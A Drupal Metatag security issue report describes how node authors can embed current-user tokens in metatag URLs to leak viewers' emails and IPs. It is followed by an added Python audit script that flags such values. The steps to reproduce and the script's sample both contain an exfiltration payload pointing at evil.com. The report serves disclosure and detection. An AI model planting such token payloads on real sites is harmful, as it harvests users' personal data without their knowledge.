Background information

This was originally reported as a private security issue, but has been approved for handling in the public queue by the Drupal Security Team.

Problem/Motivation

The ability to use tokens in metatag fields could allow a user that can create nodes to gain some info about users loading this node.

Steps to reproduce

  1. Create a bundle with a metatag field.
  2. As a user with the permission to create nodes in this bundle (but not the view user email addresses permission), create a node with this value in Default icon: http://evil.com/?user=[current-user:account-name]&email=[current-user:mail]&ip=[current-user:ip-address]
  3. Every time a logged-in user loads this node, you get sent their e-mail address.

Other tags could be used for this.
I suppose this can be mitigated with metatag_extended_perms.

(Tokens currently don't have access checks: #3489852: Token replace system has no access checking
But even if this was fixed, users would have access to their own e-mail address.)

Proposed resolution

Remaining tasks

User interface changes

API changes

Data model changes

Comments

prudloff created an issue.
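
An added example, not part of the original issue or of the Metatag module: a review-time check that flags stored metatag values which place viewer-scoped tokens inside a URL, and marks whether the URL's host is first-party. The tag-name-to-value mapping, the `example.org` host and the function name are assumptions; the flagged sample value is the one from the steps to reproduce.

```python
import re
from urllib.parse import urlsplit

# Token syntax as it appears in the report: [type:name], e.g. [current-user:mail].
TOKEN_RE = re.compile(r"\[([a-z0-9_-]+):([^\[\]\s]+)\]", re.I)
URL_RE = re.compile(r"https?://[^\s\"'<>]+", re.I)
# Token types that resolve per viewer, not per node (assumed review policy).
VIEWER_TYPES = {"current-user"}


def audit_metatags(tags, site_hosts):
    """Flag tag values that embed viewer-scoped tokens in a URL.

    tags: mapping of tag label -> raw, unreplaced value (assumed export format).
    site_hosts: set of hostnames treated as first-party.
    """
    findings = []
    for tag, value in tags.items():
        for url in URL_RE.findall(value):
            tokens = [f"[{t}:{n}]" for t, n in TOKEN_RE.findall(url)
                      if t.lower() in VIEWER_TYPES]
            if not tokens:
                continue
            try:
                host = (urlsplit(url).hostname or "").lower()
            except ValueError:
                # A token used as the host part cannot be parsed; treat as unknown.
                host = ""
            findings.append({"tag": tag, "host": host,
                             "external": host not in site_hosts,
                             "tokens": tokens})
    return findings


# Constructed sample; the "Default icon" value is the one quoted in the report.
SAMPLE = {
    "Title": "[node:title] | [site:name]",
    "Default icon": "http://evil.com/?user=[current-user:account-name]"
                    "&email=[current-user:mail]&ip=[current-user:ip-address]",
    "Image": "https://example.org/img/[node:nid].png",
    "Canonical URL": "https://example.org/?u=[current-user:uid]",
}

if __name__ == "__main__":
    for f in audit_metatags(SAMPLE, {"example.org"}):
        print(f)
```

Findings with `external` set are the ones matching the report; first-party findings are listed for review because the viewer's data still ends up in a request URL.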